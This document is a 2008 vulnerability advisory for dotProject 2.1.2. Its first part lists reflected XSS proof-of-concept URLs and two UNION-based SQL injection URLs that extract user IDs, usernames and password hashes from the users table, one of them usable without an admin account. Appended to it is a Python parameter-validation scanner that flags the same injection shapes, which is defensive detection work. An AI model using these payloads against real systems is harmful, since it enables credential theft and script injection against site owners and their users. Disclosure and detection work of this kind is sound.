#========================================================================#
                        (http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: dotProject 2.1.2 (29/06/2008)
Product WebSite: http://www.dotproject.net/

(*) With some of these exploits you need an ADMIN/ANONYMOUS account
(*) I think that this project might be vulnerable to Cross-Site Request Forgery
#========================================================================#

#=============================[XSS]======================================#
POC:
/index.php?m=tasks&inactive=toggle">
/index.php?m=calendar&a=day_view&date=20080828">
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar">
/index.php?m=ticketsmith&type=My'>
#========================================================================#

#=============================[SQL]======================================#
POC as "ADMIN":
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users

POC as "ANONYMOUS" or other:
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--
#========================================================================#

#========================================================================#
Contact: C1c4Tr1Z (http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#
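
A defensive check for the parameters in the PoC URLs above, as an added example that is not part of the original advisory or of dotProject's code: it compares each parameter against an assumed value shape and flags requests that break it. The patterns in PARAM_RULES, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed value shapes for the parameters named in the advisory's PoC URLs.
# These patterns are illustrative assumptions, not dotProject's own rules.
PARAM_RULES = {
    "user_id": re.compile(r"[0-9]+"),                   # numeric key
    "tab": re.compile(r"-?[0-9]+"),                     # tab index, -1 allowed
    "date": re.compile(r"[0-9]{8}"),                    # YYYYMMDD
    "callback": re.compile(r"[A-Za-z_][A-Za-z0-9_]*"),  # JS function name
    "inactive": re.compile(r"[A-Za-z]+"),               # e.g. "toggle"
    "type": re.compile(r"[A-Za-z]+"),                   # e.g. "My"
}


def violations(request_target):
    """Return the parameters whose decoded value breaks its assumed shape."""
    query = urlsplit(request_target).query
    bad = []
    # parse_qsl percent-decodes and yields every occurrence, so a repeated
    # parameter cannot hide a bad value behind a clean one.
    for name, value in parse_qsl(query, keep_blank_values=True):
        rule = PARAM_RULES.get(name)
        # fullmatch, not match/search: "1 AND 1=0" must not pass as "1".
        if rule is not None and rule.fullmatch(value) is None:
            bad.append(name)
    return bad


# Constructed request targets (not real logs): clean requests next to
# shortened, URL-encoded variants of the request shapes in the advisory.
SAMPLE_REQUESTS = [
    "/index.php?m=admin&a=viewuser&user_id=1",
    "/index.php?m=admin&a=viewuser&user_id=1%20AND%201=0%20UNION%20SELECT%201,2",
    "/index.php?m=projects&tab=-1",
    "/index.php?m=projects&tab=-1+UNION+SELECT+1,2--",
    "/index.php?m=calendar&a=day_view&date=20080828",
    "/index.php?m=tasks&inactive=toggle%22%3E",
    "/index.php?m=ticketsmith&type=My%27%3E",
]


def scan(requests):
    """Map each flagged request target to its offending parameters."""
    return {r: v for r in requests if (v := violations(r))}


if __name__ == "__main__":
    for target, params in scan(SAMPLE_REQUESTS).items():
        print("FLAG", params, target)
```

The same shape check applied server-side before a value reaches a query or the rendered page is input validation; it complements parameterized queries and output encoding rather than replacing them.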